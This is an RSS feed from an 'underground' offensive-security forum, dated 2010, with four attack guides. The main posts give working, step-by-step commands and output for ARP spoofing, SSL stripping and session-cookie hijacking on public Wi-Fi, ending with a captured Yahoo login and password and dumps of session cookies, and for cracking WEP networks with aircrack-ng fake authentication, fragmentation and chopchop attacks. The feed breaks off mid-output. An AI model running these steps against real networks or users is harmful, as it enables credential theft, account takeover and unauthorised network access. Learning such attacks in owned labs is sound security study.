<![CDATA[InterN0T - Underground Security Training - Offensive Guides & Information]]> http://forum.intern0t.net/ This is where you can post your guides. en Tue, 07 Sep 2010 15:31:24 GMT vBulletin 60 http://forum.intern0t.net/electric/misc/rss.jpg <![CDATA[InterN0T - Underground Security Training - Offensive Guides & Information]]> http://forum.intern0t.net/ My First Shellcode - Part 2 http://forum.intern0t.net/offensive-guides-information/3042-my-first-shellcode-part-2-a.html Tue, 07 Sep 2010 13:17:44 GMT After reading the introduction to shellcoding: http://forum.intern0t.net/offensive-...-part-1-a.html

You're ready to continue onto something a bit more advanced.

I didn't intend to create a PDF but the content and information wasn't
suitable for a mega thread here on InterN0T because the total size of
the PDF is 30 pages, a bit too much for a forum thread in my opinion :wink:

So take your time to enjoy and read the PDF :biggrin:

Comments and feedback are of course more than welcome.



The PDF is attached below.
Attached Files
File Type: pdf Manual Shellcode.pdf (1.32 MB)
]]> MaXe http://forum.intern0t.net/offensive-guides-information/3042-my-first-shellcode-part-2-a.html WiFu series: Episode 2 cracking clientless networks http://forum.intern0t.net/offensive-guides-information/3033-wifu-series-episode-2-cracking-clientless-networks.html Sat, 04 Sep 2010 16:39:04 GMT Hi Version 2 of the second video is now ready for download, featuring new music and it quicker from start to finish but still containing the same... Hi

Version 2 of the second video is now ready for download, featuring new music
and it quicker from start to finish but still containing the same information

http://rapidshare.com/files/41726635...P_crack_v2.zip

Password = Intern0t

The target network for this video was called linksys

I chose something a little bit more upbeat in music this time, hope you like :D

I was using the new BT4 R1 release this time with the Alfa AWUS036H usb card

There is a slight issue with drivers, so at the beginning I manually used the old drivers
from BackTrack 3

Note this was booting off of the live CD this time, so you should be able to replicate all
of this as it is obviously changing mac addresses etc

Here is how I did it

Code:
Unloaded the new driver for the RTL8187, and loaded the BT3 r8187 driver

Started monitor mode (notice the interface on monitor mode didn't change)

Looked on channel 6 for the target networks mac address

Started screen so I could use multiple sessions

Started airodump-ng on channel 6 to write to the file linksys using the interface wlan0

Next, I fake authenticated with the network using the access points BSSID (mac address)
and the ESSID (broadcast SSID)

Then I attempted to perform a fragmentation attack, and waited for a few minutes for the
Access Point to send out a broadcast packet so I could obtain a PRGA file and I would be
able to create my own packets for later injection

Once captured, I was able to create a new arp packet in packetforge, which would
hopefully generate for IVs and enable me to obtain the encryption key for the network

I then injected my newly created ARP packet into the network and the Access Point
started to create new IVs as planned, then I attempted to crack the WEP encryption key
and obtain access to the network

GAME OVER
Hope you all enjoy the video

Until next time
Good luck :D

:: EDIT ::

Episode 1 here ]]> TheXero http://forum.intern0t.net/offensive-guides-information/3033-wifu-series-episode-2-cracking-clientless-networks.html Guide Sidejacking with SSL Stripping http://forum.intern0t.net/offensive-guides-information/3023-sidejacking-ssl-stripping.html Thu, 02 Sep 2010 08:42:40 GMT Sidejacking with Hamster/Ferret with SSL Strip Tools used within this tutorial. arpspoof sslstrip Hamster/Ferret AWUS 036H... Sidejacking with Hamster/Ferret with SSL Strip


Tools used within this tutorial.


arpspoof
sslstrip
Hamster/Ferret
AWUS 036H wireless card


Scenario: Using Hamster/Ferret to session sidejacking a target at your local free wifi spot.


Prerequisites: Connect to the AP of your choice, and do a ping sweep to determine who is on that network.


For simplicity I am using my own network this time, however I am going under the wireless interface of wlan0 on my host box. I am connected to my AP on my host machine, and that wireless adapter is bridged to my virtual machine.


root@bt:~# nmap -sP 192.168.1.1-255


Starting Nmap 5.00 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2010-09-01 23:39 CDT
Host DD-WRT (192.168.1.1) is up (0.010s latency).
MAC Address: 00:24:A5:AD:79:59 (Buffalo)
Host bt (192.168.1.140) is up.
Host Wizardsfire (192.168.1.120) is up (0.0017s latency).
MAC Address: 00:C0:CA:33:7F:72 (ALFA)
Nmap done: 255 IP addresses (3 hosts up) scanned in 4.20 seconds


so now lets analyze a list of potential targets


192168.1.1 (DD-WRT) this is a router
192.168.1.140 (BT) This is the attacking computer
192.168.1.120 (WizardsFire) this would be the victim


So now that we know were going to attack 192168.1.120 we need to use arpspoof.


BUT before that we need to enable ip forwarding


Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
The #1 simply means your turning it on.


Now for arpspoof


root@bt:~# arpspoof -i eth0 -t 192.168.1.120 192.168.1.1


If your successful you should see something similar below. When you do minimize this window.


Code:
8:0:27:5:25:8d 0:0:0:0:0:0 0806 42: arp reply 192.168.1.1 is-at 8:0:27:5:25:8d
 8:0:27:5:25:8d 0:0:0:0:0:0 0806 42: arp reply 192.168.1.1 is-at 8:0:27:5:25:8d

Now we need to configure our iptables to reroute the traffic from port 80 to sslstrip's default port of 10000.


Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Now we need to setup sslstrip


Code:
sslstrip -p -k -f -w decryptedlogfile

-p is logs only SSL posts (default option)
-k kills sessions that are in progress (if any)
-f substitutes a lock favicon on secure requests
-w write the captured info to a filename of your choice.


Now I don't know about you but sometimes I forget where things are..in this case it was hamster which is what we will be firing up in just a few moments.


Code:
locate hamster 
 /opt/metasploit3/msf3/data/exploits/capture/http/forms/xhamster.com.txt
 /opt/metasploit3/msf3/data/exploits/capture/http/forms/.svn/text-base/xhamster.com.txt.svn-base
 /pentest/sniffers/hamster
 /pentest/sniffers/hamster/favicon.ico
 /pentest/sniffers/hamster/ferret
 /pentest/sniffers/hamster/hamster
 /pentest/sniffers/hamster/hamster.css
 /pentest/sniffers/hamster/hamster.js
 /var/lib/dpkg/info/hamster.changelog
 /var/lib/dpkg/info/hamster.copyright
 /var/lib/dpkg/info/hamster.list

Based on the ^ we can see that what I want is in the /pentest/sniffers/hamster directory.


So do the following


Code:
cd /pentest/sniffers/hamster/

Now do the following


Code:
root@bt:/pentest/sniffers/hamster# ./hamster
If Sucessful you will see something similar


Code:
--- HAMPSTER 2.0 side-jacking tool ---
 begining thread
 Set browser to use proxy http://127.0.0.1:1234
 DEBUG: set_ports_option(1234)
 DEBUG: mg_open_listening_port(1234)
 Proxy: listening on 127.0.0.1:

Now make sure you input the following for the http proxy portion of firefox (this step allows us to access hamster)


Click on Edit>Options>Advanced>Network> Connect Settings.


Then enter under http proxy the following 127.0.0.1 and the port is 1234


NOTE: make sure to also tick the manual proxy configuration bubble.


Now enter 127.0.0.1:1234 into your URL bar


Your now looking at the hamster interface.


Click on adapters and in this case I'm going to select eth0 as that's what I'm using.


Now if your successful you will start to see the packets go up.


Now on the victims machine I'm going to log into my email account.


Victim types in www.mail..com and enters his/her credentials.


Now you will notice on hamster you will see 192.168.1.120 pop up (victims ip)


Click on that


Now click on cookie info and you should see something similar


Code:
[us.mc451.mail.yahoo.com]
 

    * /mc/welcome
          o B = eair0gp67un5r&b=4&d=Y.Ivp15pYELsUqMUHzmmW3ecyZOqxjjOVeKoyQ--&s=ti&i=epROpk0yjlKH5lYEXqfq
          o MG = d=ctRc14rR5DbhuSHxsD8Vwv.8Bf22tvlG6co3Qnxru4DgbPE0Pl.4ncsY1mFM8gba4CpVqqS_FIm5X2w_h5tziKrTW6d9pug-&v=1
          o AICookieTest = 245
          o YM.MGC = uyUU61Z9hT48WFzVU4fC7N9fbD6BdQvqtss-
          o YM.GX = r9To33zxvBxDkSlGloa2xwG5iARxWJKPKj0IoFPv.Lps_gwbqXRT16dk1NzSNE1krzKLTr.aYdlxrkqbIiHul6jV8n0H6kEoCcthE6gjT4BEB1mZ50MUX.HRM1ljww--
          o T = z=Iz1fMBIHdkMBd2UWO9RN5X1MzI2BjU2TjYwME4yMDQ-&a=QAE&sk=DAA6mv9yAM2u5c&ks=EAAUM2hoiSTfVsd_8k90_2Phw--~E&d=c2wBTkRVeEFUSXhPVEUzTnprMU56TS0BYQFRQUUBZwFUT0tWM1ZONkVRNkZKQlM3WFFFN0JXTzI2SQF0aXABWXNLUDZCAXp6AUl6MWZNQkE3RQ--
          o PH = fn=F7.KSky_NtjqnNkM2JIG&l=en-US
          o Y = v=1&n=03pcanilpo8vp&l=m8220dbeh3rssr/o&p=m2o1th4013000000&jb=27|47|&r=cg&lg=en-US&intl=us&np=1
          o F = a=CGUlau0MvTToHoKTP_g7Di0M0bQwP_.TDRmyIg2m4xtuv3ZQtnEjkT4gGFGyj6jwlw3R7bw-&b=B7aH
    * /mc/fc
          o YM.GX = r9To33zxvBxDkSlGloa2xwG5iARxWJKPKj0IoFPv.Lps_gwbqXRT16dk1NzSNE1krzKLTr.aYdlxrkqbIiHul6jV8n0H6kEoCcthE6gjT4BEB1mZ50MUX.HRM1ljww--
          o T = z=Iz1fMBIHdkMBd2UWO9RN5X1MzI2BjU2TjYwME4yMDQ-&a=QAE&sk=DAA6mv9yAM2u5c&ks=EAAUM2hoiSTfVsd_8k90_2Phw--~E&d=c2wBTkRVeEFUSXhPVEUzTnprMU56TS0BYQFRQUUBZwFUT0tWM1ZONkVRNkZKQlM3WFFFN0JXTzI2SQF0aXABWXNLUDZCAXp6AUl6MWZNQkE3RQ--
          o PH = fn=F7.KSky_NtjqnNkM2JIG&l=en-US
          o Y = v=1&n=03pcanilpo8vp&l=m8220dbeh3rssr/o&p=m2o1th4013000000&jb=27|47|&r=cg&lg=en-US&intl=us&np=1
          o F = a=CGUlau0MvTToHoKTP_g7Di0M0bQwP_.TDRmyIg2m4xtuv3ZQtnEjkT4gGFGyj6jwlw3R7bw-&b=B7aH
          o B = eair0gp67un5r&b=4&d=Y.Ivp15pYELsUqMUHzmmW3ecyZOqxjjOVeKoyQ--&s=ti&i=epROpk0yjlKH5lYEXqfq
          o MG = d=ctRc14rR5DbhuSHxsD8Vwv.8Bf22tvlG6co3Qnxru4DgbPE0Pl.4ncsY1mFM8gba4CpVqqS_FIm5X2w_h5tziKrTW6d9pug-&v=1
          o AICookieTest = 245
          o YM.MGC = uyUU61Z9hT48WFzVU4fC7N9fbD6BdQvqtss- 
    * /mc/nc
          o YM.GX = r9To33zxvBxDkSlGloa2xwG5iARxWJKPKj0IoFPv.Lps_gwbqXRT16dk1NzSNE1krzKLTr.aYdlxrkqbIiHul6jV8n0H6kEoCcthE6gjT4BEB1mZ50MUX.HRM1ljww--
          o T = z=Iz1fMBIHdkMBd2UWO9RN5X1MzI2BjU2TjYwME4yMDQ-&a=QAE&sk=DAA6mv9yAM2u5c&ks=EAAUM2hoiSTfVsd_8k90_2Phw--~E&d=c2wBTkRVeEFUSXhPVEUzTnprMU56TS0BYQFRQUUBZwFUT0tWM1ZONkVRNkZKQlM3WFFFN0JXTzI2SQF0aXABWXNLUDZCAXp6AUl6MWZNQkE3RQ--
          o PH = fn=F7.KSky_NtjqnNkM2JIG&l=en-US
          o Y = v=1&n=03pcanilpo8vp&l=m8220dbeh3rssr/o&p=m2o1th4013000000&jb=27|47|&r=cg&lg=en-US&intl=us&np=1
          o F = a=CGUlau0MvTToHoKTP_g7Di0M0bQwP_.TDRmyIg2m4xtuv3ZQtnEjkT4gGFGyj6jwlw3R7bw-&b=B7aH
          o B = eair0gp67un5r&b=4&d=Y.Ivp15pYELsUqMUHzmmW3ecyZOqxjjOVeKoyQ--&s=ti&i=epROpk0yjlKH5lYEXqfq
          o MG = d=ctRc14rR5DbhuSHxsD8Vwv.8Bf22tvlG6co3Qnxru4DgbPE0Pl.4ncsY1mFM8gba4CpVqqS_FIm5X2w_h5tziKrTW6d9pug-&v=1
          o AICookieTest = 245
          o YM.MGC = uyUU61Z9hT48WFzVU4fC7N9fbD6BdQvqtss- 
    * /mc/showMessage
          o YM.GX = r9To33zxvBxDkSlGloa2xwG5iARxWJKPKj0IoFPv.Lps_gwbqXRT16dk1NzSNE1krzKLTr.aYdlxrkqbIiHul6jV8n0H6kEoCcthE6gjT4BEB1mZ50MUX.HRM1ljww--
          o T = z=Iz1fMBIHdkMBd2UWO9RN5X1MzI2BjU2TjYwME4yMDQ-&a=QAE&sk=DAA6mv9yAM2u5c&ks=EAAUM2hoiSTfVsd_8k90_2Phw--~E&d=c2wBTkRVeEFUSXhPVEUzTnprMU56TS0BYQFRQUUBZwFUT0tWM1ZONkVRNkZKQlM3WFFFN0JXTzI2SQF0aXABWXNLUDZCAXp6AUl6MWZNQkE3RQ--
          o PH = fn=F7.KSky_NtjqnNkM2JIG&l=en-US
          o Y = v=1&n=03pcanilpo8vp&l=m8220dbeh3rssr/o&p=m2o1th4013000000&jb=27|47|&r=cg&lg=en-US&intl=us&np=1
          o F = a=CGUlau0MvTToHoKTP_g7Di0M0bQwP_.TDRmyIg2m4xtuv3ZQtnEjkT4gGFGyj6jwlw3R7bw-&b=B7aH
          o B = eair0gp67un5r&b=4&d=Y.Ivp15pYELsUqMUHzmmW3ecyZOqxjjOVeKoyQ--&s=ti&i=epROpk0yjlKH5lYEXqfq
          o AICookieTest = 245
          o YM.MGC = uyUU61Z9hT48WFzVU4fC7N9fbD6BdQvqtss- 
    * /galaxy/friends.php
          o B = eair0gp67un5r&b=4&d=Y.Ivp15pYELsUqMUHzmmW3ecyZOqxjjOVeKoyQ--&s=ti&i=epROpk0yjlKH5lYEXqfq
          o T = z=Iz1fMBIHdkMBd2UWO9RN5X1MzI2BjU2TjYwME4yMDQ-&a=QAE&sk=DAA6mv9yAM2u5c&ks=EAAUM2hoiSTfVsd_8k90_2Phw--~E&d=c2wBTkRVeEFUSXhPVEUzTnprMU56TS0BYQFRQUUBZwFUT0tWM1ZONkVRNkZKQlM3WFFFN0JXTzI2SQF0aXABWXNLUDZCAXp6AUl6MWZNQkE3RQ--
          o PH = fn=F7.KSky_NtjqnNkM2JIG&l=en-US
          o Y = v=1&n=03pcanilpo8vp&l=m8220dbeh3rssr/o&p=m2o1th4013000000&jb=27|47|&r=cg&lg=en-US&intl=us&np=1
          o F = a=CGUlau0MvTToHoKTP_g7Di0M0bQwP_.TDRmyIg2m4xtuv3ZQtnEjkT4gGFGyj6jwlw3R7bw-&b=B7aH
    * /mc/showFolder
          o YM.GX = r9To33zxvBxDkSlGloa2xwG5iARxWJKPKj0IoFPv.Lps_gwbqXRT16dk1NzSNE1krzKLTr.aYdlxrkqbIiHul6jV8n0H6kEoCcthE6gjT4BEB1mZ50MUX.HRM1ljww--
          o MG = d=ctRc14rR5DbhuSHxsD8Vwv.8Bf22tvlG6co3Qnxru4DgbPE0Pl.4ncsY1mFM8gba4CpVqqS_FIm5X2w_h5tziKrTW6d9pug-&v=1
          o T = z=Iz1fMBIHdkMBd2UWO9RN5X1MzI2BjU2TjYwME4yMDQ-&a=QAE&sk=DAA6mv9yAM2u5c&ks=EAAUM2hoiSTfVsd_8k90_2Phw--~E&d=c2wBTkRVeEFUSXhPVEUzTnprMU56TS0BYQFRQUUBZwFUT0tWM1ZONkVRNkZKQlM3WFFFN0JXTzI2SQF0aXABWXNLUDZCAXp6AUl6MWZNQkE3RQ--
          o PH = fn=F7.KSky_NtjqnNkM2JIG&l=en-US
          o Y = v=1&n=03pcanilpo8vp&l=m8220dbeh3rssr/o&p=m2o1th4013000000&jb=27|47|&r=cg&lg=en-US&intl=us&np=1
          o F = a=CGUlau0MvTToHoKTP_g7Di0M0bQwP_.TDRmyIg2m4xtuv3ZQtnEjkT4gGFGyj6jwlw3R7bw-&b=B7aH
          o B = eair0gp67un5r&b=4&d=Y.Ivp15pYELsUqMUHzmmW3ecyZOqxjjOVeKoyQ--&s=ti&i=epROpk0yjlKH5lYEXqfq
          o AICookieTest = 245
          o YM.MGC = uyUU61Z9hT48WFzVU4fC7N9fbD6BdQvqtss- 
    * /mc/compose
          o YM.GX = r9To33zxvBxDkSlGloa2xwG5iARxWJKPKj0IoFPv.Lps_gwbqXRT16dk1NzSNE1krzKLTr.aYdlxrkqbIiHul6jV8n0H6kEoCcthE6gjT4BEB1mZ50MUX.HRM1ljww--
          o MG = d=ctRc14rR5DbhuSHxsD8Vwv.8Bf22tvlG6co3Qnxru4DgbPE0Pl.4ncsY1mFM8gba4CpVqqS_FIm5X2w_h5tziKrTW6d9pug-&v=1
          o T = z=Iz1fMBIHdkMBd2UWO9RN5X1MzI2BjU2TjYwME4yMDQ-&a=QAE&sk=DAA6mv9yAM2u5c&ks=EAAUM2hoiSTfVsd_8k90_2Phw--~E&d=c2wBTkRVeEFUSXhPVEUzTnprMU56TS0BYQFRQUUBZwFUT0tWM1ZONkVRNkZKQlM3WFFFN0JXTzI2SQF0aXABWXNLUDZCAXp6AUl6MWZNQkE3RQ--
          o PH = fn=F7.KSky_NtjqnNkM2JIG&l=en-US
          o Y = v=1&n=03pcanilpo8vp&l=m8220dbeh3rssr/o&p=m2o1th4013000000&jb=27|47|&r=cg&lg=en-US&intl=us&np=1
          o F = a=CGUlau0MvTToHoKTP_g7Di0M0bQwP_.TDRmyIg2m4xtuv3ZQtnEjkT4gGFGyj6jwlw3R7bw-&b=B7aH
          o B = eair0gp67un5r&b=4&d=Y.Ivp15pYELsUqMUHzmmW3ecyZOqxjjOVeKoyQ--&s=ti&i=epROpk0yjlKH5lYEXqfq
          o AICookieTest = 245
          o YM.MGC = uyUU61Z9hT48WFzVU4fC7N9fbD6BdQvqtss- 
    * /mc/mail
          o YM.GX = r9To33zxvBxDkSlGloa2xwG5iARxWJKPKj0IoFPv.Lps_gwbqXRT16dk1NzSNE1krzKLTr.aYdlxrkqbIiHul6jV8n0H6kEoCcthE6gjT4BEB1mZ50MUX.HRM1ljww--
          o MG = d=ctRc14rR5DbhuSHxsD8Vwv.8Bf22tvlG6co3Qnxru4DgbPE0Pl.4ncsY1mFM8gba4CpVqqS_FIm5X2w_h5tziKrTW6d9pug-&v=1
          o T = z=Iz1fMBIHdkMBd2UWO9RN5X1MzI2BjU2TjYwME4yMDQ-&a=QAE&sk=DAA6mv9yAM2u5c&ks=EAAUM2hoiSTfVsd_8k90_2Phw--~E&d=c2wBTkRVeEFUSXhPVEUzTnprMU56TS0BYQFRQUUBZwFUT0tWM1ZONkVRNkZKQlM3WFFFN0JXTzI2SQF0aXABWXNLUDZCAXp6AUl6MWZNQkE3RQ--
          o PH = fn=F7.KSky_NtjqnNkM2JIG&l=en-US
          o Y = v=1&n=03pcanilpo8vp&l=m8220dbeh3rssr/o&p=m2o1th4013000000&jb=27|47|&r=cg&lg=en-US&intl=us&np=1
          o F = a=CGUlau0MvTToHoKTP_g7Di0M0bQwP_.TDRmyIg2m4xtuv3ZQtnEjkT4gGFGyj6jwlw3R7bw-&b=B7aH
          o B = eair0gp67un5r&b=4&d=Y.Ivp15pYELsUqMUHzmmW3ecyZOqxjjOVeKoyQ--&s=ti&i=epROpk0yjlKH5lYEXqfq
          o AICookieTest = 245
          o YM.MGC = uyUU61Z9hT48WFzVU4fC7N9fbD6BdQvqtss- 
    * /
          o B = eair0gp67un5r&b=4&d=Y.Ivp15pYELsUqMUHzmmW3ecyZOqxjjOVeKoyQ--&s=ti&i=epROpk0yjlKH5lYEXqfq
          o T = z=Iz1fMBIHdkMBd2UWO9RN5X1MzI2BjU2TjYwME4yMDQ-&a=QAE&sk=DAA6mv9yAM2u5c&ks=EAAUM2hoiSTfVsd_8k90_2Phw--~E&d=c2wBTkRVeEFUSXhPVEUzTnprMU56TS0BYQFRQUUBZwFUT0tWM1ZONkVRNkZKQlM3WFFFN0JXTzI2SQF0aXABWXNLUDZCAXp6AUl6MWZNQkE3RQ--
          o PH = fn=F7.KSky_NtjqnNkM2JIG&l=en-US
          o Y = v=1&n=03pcanilpo8vp&l=m8220dbeh3rssr/o&p=m2o1th4013000000&jb=27|47|&r=cg&lg=en-US&intl=us&np=1
          o F = a=CGUlau0MvTToHoKTP_g7Di0M0bQwP_.TDRmyIg2m4xtuv3ZQtnEjkT4gGFGyj6jwlw3R7bw-&b=B7aH
    * /mc/md.php
          o YM.GX = r9To33zxvBxDkSlGloa2xwG5iARxWJKPKj0IoFPv.Lps_gwbqXRT16dk1NzSNE1krzKLTr.aYdlxrkqbIiHul6jV8n0H6kEoCcthE6gjT4BEB1mZ50MUX.HRM1ljww--
          o MG = d=ctRc14rR5DbhuSHxsD8Vwv.8Bf22tvlG6co3Qnxru4DgbPE0Pl.4ncsY1mFM8gba4CpVqqS_FIm5X2w_h5tziKrTW6d9pug-&v=1
          o AICookieTest = 245
          o YM.MGC = uyUU61Z9hT48WFzVU4fC7N9fbD6BdQvqtss-
          o T = z=Iz1fMBIHdkMBd2UWO9RN5X1MzI2BjU2TjYwME4yMDQ-&a=QAE&sk=DAA6mv9yAM2u5c&ks=EAAUM2hoiSTfVsd_8k90_2Phw--~E&d=c2wBTkRVeEFUSXhPVEUzTnprMU56TS0BYQFRQUUBZwFUT0tWM1ZONkVRNkZKQlM3WFFFN0JXTzI2SQF0aXABWXNLUDZCAXp6AUl6MWZNQkE3RQ--
          o PH = fn=F7.KSky_NtjqnNkM2JIG&l=en-US
          o Y = v=1&n=03pcanilpo8vp&l=m8220dbeh3rssr/o&p=m2o1th4013000000&jb=27|47|&r=cg&lg=en-US&intl=us&np=1
          o F = a=CGUlau0MvTToHoKTP_g7Di0M0bQwP_.TDRmyIg2m4xtuv3ZQtnEjkT4gGFGyj6jwlw3R7bw-&b=B7aH
          o B = eair0gp67un5r&b=4&d=Y.Ivp15pYELsUqMUHzmmW3ecyZOqxjjOVeKoyQ--&s=ti&i=epROpk0yjlKH5lYEXqfq

Now for the sake of pages the ^ is what you need to look for. When you do you go back to the hyperlinks within hamster and click on one that looks like this


http://mail.yahoo.com/


Click the ^ and you will see the targets inbox


Now you can save all the cookies you have collected and analyze them for later, however to be honest that's a little more than I've experimented with thus far.


Remember the sslstrip log I had you create?


Well here's where it comes in handy.


If you use your favorite text editor to open decryptedlog you should see something close to the following


Code:
2010-09-02 03:13:56,516 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=&.u=9h803c967un5r&.v=0&.challenge=dyPV3mcewPyQV.eKfr3rGQG1JrAu&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&pad=5&aad=5&login=wiccanlord&passwd=g-student&.save=

The string you want is right here


Code:
login=wiccanlord&passwd=g-student&.save=

Login: wiccanlord
password: g-student


Countermeasures


  • Pay attention to your url bar, if it usually says HTTPS say for banking, email, etc..DO NOT type in your credentials when it says http.
  • Log out of your web-sessions when your finished
  • check your log files on the sites of which you log into, if it does not match what you think it should, more than likely you've been attacked.


I hope you enjoyed this tutorial


Securityxxxpert ]]> securityxxxpert http://forum.intern0t.net/offensive-guides-information/3023-sidejacking-ssl-stripping.html Guide Cracking WEP Without Clients Connected To WAP http://forum.intern0t.net/offensive-guides-information/3019-cracking-wep-without-clients-connected-wap.html Wed, 01 Sep 2010 07:03:22 GMT * 1 - Set the wireless card MAC address * 2 - Start the wireless interface in monitor mode * 3 - Scan for WEP access points * 4 - Pick out which...
  • 1 - Set the wireless card MAC address
  • 2 - Start the wireless interface in monitor mode
  • 3 - Scan for WEP access points
  • 4 - Pick out which WEP AP you want to attack, and associate airodump to that channel/bssid.
  • 5 - Use aireplay-ng chopchop or fragmentation attack to obtain PRGA
  • 6 - Use packetforge-ng to create a ARP packet
  • 7 - Step Inject the ARP packetfrom step #6
  • Final Step – Crack the WEP key


Step 1: Set up the wireless card MAC Address



This isn't really necessary however the command to do so is machange -r mon0
Keep in mind this applies to the card that I have, your interface may be different.
-r (random). By using this flag the mac address generated will be random.


root@bt:~# macchanger -r wlan0
Current MAC: 00:c0:ca:33:7f:72 (Alfa, Inc.)
Faked MAC: 36:b1:e6:05:32:da (unknown)


Step 2: Start the wireless interface in monitor mode


airmong-ng start wlan0


note once again wlan0 is my interface. Feel free to check for yours with the iwconfig command.


You should see the following


root@bt:~# airmon-ng start wlan0




Interface Chipset Driver


wlan0 RTL8187 rtl8187 - [phy0]
(monitor mode enabled on mon1)
mon0 RTL8187 rtl8187 - [phy0]


If you see the “monitor mode enabled” you know your then good to go.


Step 3. Scan for WEP access points



airodump-ng mon0


You should see something like this.


CH 7 ][ Elapsed: 16 s ][ 2010-09-01 00:39


BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID


00:24:A5:AD:79:59 -13 26 0 0 6 54e. WPA2 CCMP PSK PwnSauce
00:1C:10:A1:C1:32 -61 3 0 0 11 54 WEP WEP dusty
00:1B:5B:B3:B5:71 -63 4 2 0 8 54 . WEP WEP 2WIRE486
00:18:39:B1:4D:DD -64 14 0 0 1 54 WPA2 CCMP PSK rocky4191980net
00:19:E4:48:97:A9 -63 11 0 0 1 54 . WEP WEP 2WIRE040
00:18:39:62:34:EE -63 19 0 0 6 54 OPN linksys
00:25:3C:F1:C9:E9 -66 5 0 0 11 54 . WEP WEP 2WIRE266
00:1A:70:00:77:E4 -64 13 0 0 6 54 OPN Moyers
00:18:3F:2B:A2:01 -67 7 0 0 1 54 . WEP WEP 2WIRE305
00:26:50:D0:4D:C9 -69 2 0 0 6 54 . WEP WEP 2WIRE705
00:0F:66:D2:6E:F4 -70 5 0 0 6 54 . WPA TKIP PSK HFNET
00:1D:7E:97:C0:1D -71 4 0 0 1 54e WPA2 CCMP PSK RRlinksys
00:1E:E5:EB:63:6C -69 5 0 0 6 54e. WPA2 CCMP PSK jake wireless
00:23:51:3B:89:D1 -71 3 0 0 3 54 . WEP WEP 2WIRE629
00:24:B2:51:C6:CA -71 3 0 0 1 54e. WPA2 CCMP PSK Pepp-Main-Office2.4Ghz


Step 4. Pick out which WEP AP you want to attack, and associate airodump to that channel/bssid. In this case I have decided on 2WIRE040.



Airodump-ng -c 1 –bssid 00:19:E4:48:97:A9 -w wepcrack mon0


Step 6. Use aireplay-ng to do a fake authentication with the WAP.


Aireplay-ng -1 0 -e 2WIRE040 -a 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da mon0


-1 mean fake authentication attack
0 is how often it will time out in seconds
-e is the ssid name in this case 2WIRE040
-a is the Access Points MAC
-h is your mac address in this case 36:b1:e6:05:32:da
-w is the file name in this case wepcrack
mon0 is the wireless interface name


you should see something similar to this.


00:47:56 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1


00:47:56 Sending Authentication Request (Open System) [ACK]
00:47:56 Authentication successful
00:47:56 Sending Association Request [ACK]


00:48:01 Sending Authentication Request (Open System) [ACK]
00:48:01 Authentication successful
00:48:01 Sending Association Request [ACK]
00:48:01 Association successful :-) (AID: 1)


Step 5. Use aireplay-ng chopchop or fragmentation attack to obtain PRGA


Let's use the fragmentation attack first.


Aireplay -5 -b 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da mon0


-5 is the fragmentation attack
-b is the WAP MAC address in this case 00:19:E4:48:97:A9
-h is your MAC address in this case 36:b1:e6:05:32:da


you should see this


00:51:26 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1
00:51:26 Waiting for a data packet...
Read 114 packets...


Size: 68, FromDS: 1, ToDS: 0 (WEP)


BSSID = 00:19:E4:48:97:A9
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:19:E4:48:97:A9


0x0000: 0842 0000 ffff ffff ffff 0019 e448 97a9 .B...........H..
0x0010: 0019 e448 97a9 2055 df6b 2c00 2d25 81d7 ...H.. U.k,.-%..
0x0020: c27e 6181 7323 1df2 b8ba 990f 2470 b5c5 .~a.s#......$p..
0x0030: e377 3200 045a 849c 835f a199 3763 6ad6 .w2..Z..._..7cj.
0x0040: c366 64cc .fd.


Use this packet ? Y


Saving chosen packet in replay_src-0901-005130.cap
00:51:40 Data packet found!
00:51:40 Sending fragmented packet
00:51:40 Not enough acks, repeating...
00:51:40 Sending fragmented packet
00:51:42 No answer, repeating...
00:51:42 Trying a LLC NULL packet
00:51:42 Sending fragmented packet
00:51:42 Got RELAYED packet!!
00:51:42 Trying to get 384 bytes of a keystream
00:51:42 Got RELAYED packet!!
00:51:42 Trying to get 1500 bytes of a keystream
00:51:42 Got RELAYED packet!!
Saving keystream in fragment-0901-005142.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream


Was the previous step failboat? If so you might want to use a chopchop attack seen below


aireplay-ng -4 -h 36:b1:e6:05:32 -b 00:19:E4:48:97:A9 mon0


-4 mean the chopchop attack
-h is our hosts mac address in this case 36:b1:e6:05:32
-b is our WAP mac address in this case 00:19:E4:48:97:A9
mon0 is the wireless interface


You should see something similar


.
01:54:33 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1




Size: 68, FromDS: 1, ToDS: 0 (WEP)


BSSID = 00:19:E4:48:97:A9
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:19:E4:48:97:A9


0x0000: 0842 0000 ffff ffff ffff 0019 e448 97a9 .B...........H..
0x0010: 0019 e448 97a9 0094 e74d 9c00 37d2 4c5b ...H.....M..7.L[
0x0020: 3410 24dd 7b04 bdc5 fc13 ada3 339d a06f 4.$.{.......3..o
0x0030: d1e2 0825 ecc8 539e c1c5 321f 55c3 58f1 ...%..S...2.U.X.
0x0040: 1ca8 e016 ....


Use this packet ? y


Saving chosen packet in replay_src-0901-015434.cap


Offset 67 ( 0% done) | xor = 08 | pt = 1E | 168 frames written in 2862ms
Offset 66 ( 2% done) | xor = 61 | pt = 81 | 426 frames written in 7247ms
Offset 65 ( 5% done) | xor = 2C | pt = 84 | 32 frames written in 536ms
Offset 64 ( 8% done) | xor = 0A | pt = 16 | 684 frames written in 11637ms
Offset 63 (11% done) | xor = 9A | pt = 6B | 326 frames written in 5539ms
Offset 62 (14% done) | xor = 59 | pt = 01 | 182 frames written in 3100ms
Offset 61 (17% done) | xor = 6B | pt = A8 | 39 frames written in 664ms
Offset 60 (20% done) | xor = 95 | pt = C0 | 654 frames written in 11111ms
